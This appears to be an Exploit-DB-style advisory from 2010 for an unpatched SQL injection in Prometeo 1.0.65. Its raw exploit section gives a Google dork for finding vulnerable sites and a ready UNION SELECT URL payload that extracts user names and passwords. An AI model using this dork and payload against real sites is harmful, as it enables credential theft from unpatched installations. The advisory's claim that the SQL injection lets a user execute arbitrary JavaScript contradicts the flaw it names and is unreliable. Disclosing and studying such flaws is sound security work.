Prometeo (vers. 1.0.65) -SQLi Vulnerability

vendor:

Prometeo

by:

Netw0rkSecurity.net

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Prometeo

Affected Version From: 1.0.65

Affected Version To: 1.0.65

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Browser

2010

Prometeo (vers. 1.0.65) -SQLi Vulnerability

User can execute arbitrary JavaScript code within the vulnerable application. An attacker can use browser to exploit this vulnerability.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

                      ****     **    ********   **********                     /**/**   /**   **//////   /////**///                      /**//**  /**  /**             /**                         /** //** /**  /*********      /**                         /**  //**/**  ////////**      /**                         /**   //****         /**      /**                         /**    //***   ********       /**                         //      ///   ////////        // 

                          =================================                   
Prometeo (vers. 1.0.65)  -SQLi Vulnerability-                          =================================

-Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)

-Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.

-Google Dork: inurl:categoria.php?ID= comune

-Example: 
http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--

# Netw0rkSecurity.net [2010-08-26]